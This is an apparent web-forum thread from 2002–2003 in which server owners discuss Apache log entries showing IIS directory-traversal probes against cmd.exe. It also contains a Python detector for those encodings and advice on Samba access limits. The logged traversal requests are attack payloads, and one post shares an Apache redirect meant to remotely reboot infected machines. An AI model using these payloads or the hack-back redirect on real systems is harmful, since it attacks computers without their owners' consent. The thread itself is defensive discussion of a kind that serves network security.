# Strange logs in Apache

## qnx

Hi! I have something like this in my access_log (Apache) 

```
213.64.252.231 - - [29/Nov/2002:22:47:43 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 296 "-" "-"

213.64.252.231 - - [29/Nov/2002:22:47:43 +0000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 313 "-" "-"

213.64.252.231 - - [29/Nov/2002:22:47:43 +0000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 313 "-" "-"

213.64.252.231 - - [29/Nov/2002:22:47:43 +0000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 329 "-" "-"

213.64.252.231 - - [29/Nov/2002:22:47:44 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 295 "-" "-"

213.64.252.231 - - [29/Nov/2002:22:47:44 +0000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"

213.64.252.231 - - [29/Nov/2002:22:47:44 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 295 "-" "-"

213.64.252.231 - - [29/Nov/2002:22:47:44 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 295 "-" "-"

213.64.252.231 - - [29/Nov/2002:22:47:44 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275 "-" "-"

213.64.252.231 - - [29/Nov/2002:22:47:44 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275 "-" "-"

213.64.252.231 - - [29/Nov/2002:22:47:44 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 296 "-" "-"

213.64.252.231 - - [29/Nov/2002:22:47:44 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 296 "-" "-"
```

(It's just about 1% of my whole log....)

Now, I wonder if there is someone trying to crack me or it's just an IIS bug like Nimda or something like that...

Any ideas?? Shall I care about this???

----------

## rac

It looks like an IIS worm to me.  You could try sending mail to abuse@telia.com - maybe they would be able to trace it.

----------

## darktux

qnx:

Don't worry about it, we all have to live with that   :Sad:   DAMN Microsoft  :Sad: 

----------

## qnx

Thanks, I just sent my e-mail. I just wonder where you got that address from??

----------

## bosje

Hi,

I had something quite similar. 2-3 times per hour my server was being probed by various servers infected with the Nimda virus. As long as you run Apache you seem to be safe.

Mike

 *qnx wrote:*   

> Hi! I have something like this in my access_log (Apache) 
> 
> ```
> 213.64.252.231 - - [29/Nov/2002:22:47:43 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 296 "-" "-"
> 
> ...

 

----------

## qnx

 *darktux wrote:*   

> qnx:
> 
> Don't worry about it, we all have to live with that    DAMN Microsoft 

 

Well thanks, you can be sure that I'm not worried about it, I know that I'm unreachable for IIS worms in my safe Gentoo box =)

It's just that I installed apache+mysql+php for the first time in my life and I'm a little bit surprised about those HUGE logs I get....Never expected so many visitors =)

----------

## qnx

 *bosje wrote:*   

> Hi,
> 
> I had something quite similar. 2-3 times per hour my server was being probe by various servers infected with the Nimda virus. As long as you run apache you seem to be safe.
> 
> Mike
> ...

 

When did you have it?? Today?? Can it be a new worm?? ohhh it would be sooooo funny if all IIS servers got infected once again by a nmida (can't spell it, argh!) based worm  :Very Happy: 

----------

## rac

 *qnx wrote:*   

> Just wonder where you got that address from??

 

It's a guess.  I hope it works.  Many ISPs have abuse@ addresses for reporting spamming, virus spreading, harassment and other such anti-social activity.  If abuse@ doesn't work, postmaster@ is theoretically required to be deliverable at any domain.  As to how I chose telia, I ran "dig -x" on the IP address you listed in your log, and it came back with: 

```
231.252.64.213.in-addr.arpa. 86383 IN   PTR     h231n2fls31o920.telia.com.
```

----------

## qnx

Hmm...I don't have any "dig" ....Neither installed nor in emerge........It starts to sound stupid, but: where did you get it?

----------

## rac

net-dns/bind-tools

----------

## darktux

You can also use whois, just....

```
emerge whois
```

----------

## xpunkrockryanx

while it is common to get the "cmd.exe?"... requests on your web logs (result of code red/nimda activity), i don't think it's normal to be getting that many in a row from one single ip address (or at least i haven't seen it). while you're not going to be vulnerable to the types of attacks/probes you're seeing in that apache log, it might be a good idea to check your other logs for activity from the same ip. it might be that someone there is maliciously attempting to gain access to your system, so i'd say it's worth checking.

just my two cents anyway...  :Smile: 

-ryan
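The check ryan suggests, applied to the lines from the first post, as an added example (not code posted by anyone in the thread): each request path is normalised the way the probed IIS decoder handled it (repeated percent-decoding plus the overlong two-byte UTF-8 forms such as %c0%af and %c1%1c), requests that traverse out of the docroot toward cmd.exe are flagged, and probes are counted per source IP so a single host sweeping the whole list stands out from a stray hit. It assumes Python 3 and Apache's Common/Combined log format; the sample log reproduces the twelve lines from the first post plus one constructed benign request from a made-up address (192.168.0.5).

```python
"""Classify Apache access_log entries as IIS directory-traversal probes.

Added example for this thread, not code posted by any participant. The
sample log reproduces the twelve lines from the first post plus one
constructed benign line (192.168.0.5 is made up).
"""
import re
from collections import Counter
from urllib.parse import unquote

SAMPLE_LOG = """\
213.64.252.231 - - [29/Nov/2002:22:47:43 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 296 "-" "-"
213.64.252.231 - - [29/Nov/2002:22:47:43 +0000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 313 "-" "-"
213.64.252.231 - - [29/Nov/2002:22:47:43 +0000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 313 "-" "-"
213.64.252.231 - - [29/Nov/2002:22:47:43 +0000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 329 "-" "-"
213.64.252.231 - - [29/Nov/2002:22:47:44 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 295 "-" "-"
213.64.252.231 - - [29/Nov/2002:22:47:44 +0000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
213.64.252.231 - - [29/Nov/2002:22:47:44 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 295 "-" "-"
213.64.252.231 - - [29/Nov/2002:22:47:44 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 295 "-" "-"
213.64.252.231 - - [29/Nov/2002:22:47:44 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275 "-" "-"
213.64.252.231 - - [29/Nov/2002:22:47:44 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275 "-" "-"
213.64.252.231 - - [29/Nov/2002:22:47:44 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 296 "-" "-"
213.64.252.231 - - [29/Nov/2002:22:47:44 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 296 "-" "-"
192.168.0.5 - - [29/Nov/2002:23:01:02 +0000] "GET /index.html HTTP/1.0" 200 1043 "-" "Mozilla/4.0"
"""

# Common/Combined log format; referer and user-agent fields are optional.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+)(?: "(?P<referer>[^"]*)" "(?P<agent>[^"]*)")?'
)

# Two-byte sequences with a 0xC0/0xC1 lead byte: always overlong, never valid UTF-8.
_OVERLONG_RE = re.compile(r"%(c[01])%([0-9a-f]{2})", re.IGNORECASE)


def normalize_path(path: str) -> str:
    """Decode a request path the way the probed IIS decoder did, so every
    spelling variant in the log collapses to a plain '../' traversal."""

    def lax_two_byte(m):
        # A lax decoder accepts overlong forms and ignores the continuation
        # bits, so %c0%af -> '/' and %c1%1c / %c1%9c -> '\'.
        b1, b2 = int(m.group(1), 16), int(m.group(2), 16)
        return chr(((b1 & 0x1F) << 6) | (b2 & 0x3F))

    s = _OVERLONG_RE.sub(lax_two_byte, path)
    # Percent-decode until stable: %255c -> %5c -> '\', %%35%63 -> %5c -> '\'.
    for _ in range(3):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s.replace("\\", "/").lower()


def is_iis_traversal_probe(request_line: str) -> bool:
    """True when the request walks out of the docroot toward winnt\\system32."""
    parts = request_line.split()
    if len(parts) < 2:
        return False
    norm = normalize_path(parts[1])
    traversal = "/../" in norm
    target = "cmd.exe" in norm or "/winnt/system32" in norm
    return traversal and target


def summarize_by_ip(lines, threshold: int = 5) -> dict:
    """Per-source probe counts; a source at or above the threshold is
    sweeping the whole vulnerability list, not sending a stray hit."""
    probes, total = Counter(), Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        total[m["ip"]] += 1
        if is_iis_traversal_probe(m["request"]):
            probes[m["ip"]] += 1
    return {
        ip: {"probes": n, "requests": total[ip], "flagged": n >= threshold}
        for ip, n in probes.items()
    }


if __name__ == "__main__":
    for ip, info in summarize_by_ip(SAMPLE_LOG.splitlines()).items():
        print(ip, info)
```

Run it against a real access_log by replacing SAMPLE_LOG with the file's lines; the normalisation step is what makes the twelve differently encoded requests count as the same probe, and the per-IP threshold is what separates one worm-infected host from a handful of unrelated hits.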

----------

## darktux

If that 1% refers to the same ip, then I'd care, if it's not... Just forget about it....

----------

## qnx

Actually I found something in Samba's access_log. But since Samba is not working for me (I can't log in from another computer, even if I enter root and my root password), I don't think that that person could do anything =) . Anyway, it wasn't the same IP, so those ones in Apache's access_log are just worms, I guess. 

But thanks for pointing this out!

----------

## petu

 *qnx wrote:*   

> Actually I found something in Samba's access_log. But since Samba is not working for me (I can't log in from another computer, even if I enter root and my root password), I don't think that that person could do anything =) . Anyway, it wasn't the same IP, so those ones in Apache's access_log are just worms, I guess. 
> 
> But thanks for pointing this out!

 

Are you offering samba to the bad internet? IMHO samba is a great service for trusted networks (behind firewalls) but one shouldn't offer it to the global internet. Or if one does, it should be secured with an ssh tunnel or some other kind of vpn solution. Samba doesn't read user names and passwords from system files. If you want samba to work you need to use 

```
smbpasswd -a ${username}
```

to add a user where ${username} is a valid username but no shell account is required.

But please do NOT offer samba service to internet!!

----------

## qnx

 *petu wrote:*   

> But please do NOT offer samba service to internet!!

 

Hmm....ok. Something like

```
hosts deny = ALL
hosts allow = 192.168.0.
```

in my smb.conf should make it I guess??? Blocks everything except everything under 192.168.0.x, does it??

----------

## petu

 *qnx wrote:*   

> 
> 
> hosts deny = ALL
> 
> hosts allow = 192.168.0.
> ...

 

Yes it blocks everything except the 192.168.0.0/255.255.255.0 network.

----------

## simulacrum

I've run a webserver for quite a while and am quite familiar with the logs above. They're Code Red II scans. Occasionally you'll see one end in a ton of N's, which are Code Red I scans. Annoying, but there's little you can do, so many people are unwittingly infected to this day, when Code Red hit over a year ago.

----------

## Exci

sorry some stupid idiot in my class posted that....

but wasn't there a iptables way to block it?

something with 'string'

----------

## qnx

 *Exci wrote:*   

> sorry some stupid idiot in my class posted that....
> 
> but wasn't there a iptables way to block it?
> 
> something with 'string'

 

That's right, there should be some way to block it using iptables and filtering HTTP_GET or something but since these requests still do no harm, I don't think that there's any need of doing this.

----------

## axxackall

Has anyone tried to redirect bad requests using something like:

```
<Location /scripts>
    Deny from all
    ErrorDocument 403 http://127.0.0.1/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx%201
</Location>
```

Just found on slashdot, it promises to reboot the infected source of that worm.

----------

## prolific

hmm..

this is probably a person who is deliberately using a scanning utility to find vulnerable IIS servers, so that he can use the Traversal Vulnerability to setup an FTP Account on that server.. You have nothing to worry about, only Windows admins who are 2 stupid to patch their IIS have  2 worry about this.   :Very Happy: 

----------

## MasterRa

I noticed the same thing in my logs the other day. There was a lot of it, too.. from several different ip's, but most of them were on my same ISP.. I did some port scans on the first ip i noticed, and sure enough it was a windows 2000 server system. I looked around and found that it's probably the Code Red worm, as you guys mentioned before. I also noticed that it seems to lower all security settings on the system. That is, from a windows box i could do start->run type in \\the.ip, and i had access to the entire system. (ie, \\the.ip\c$, full read/write access)

Kind of odd.

I tried to warn the guy, but never got a response.. 

Oh well.

----------

## green sun

I see a ton of this stuff.. just on my ISP's network (business). It's amazing how many machines are infected with Code Red I/II/Nimda to this date...

If you are getting a ton of scans and are on a slow connection, then they are eating up some bandwidth on your machine.. I remember reading an article on setting up apache to return a response to these scans that made it stop scanning & wasting BW (esp if you serve out custom 404 error pages... think about it, if you have a 30k 404 page, you are chugging it out there every time one of those requests fails...)

Of course now that I take a second to look for it, I can't find a link to the article.. grr....

----------

## ryan83vt

http://www.psacake.com/web/eg.asp is pretty useful - Reverse IP lookup w/ lots of info like contact information for that domain, without installing a program.

----------

## zawze

```
62.106.186.109 - - [02/Feb/2003:13:50:01 +0100] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 318 "-" "-"
```

Just one of some similar requests in my apache2 log. Try to visit http://62.106.186.109/ and a french(?) site for Windows NT 4.0 Options Pack occurs :)

----------

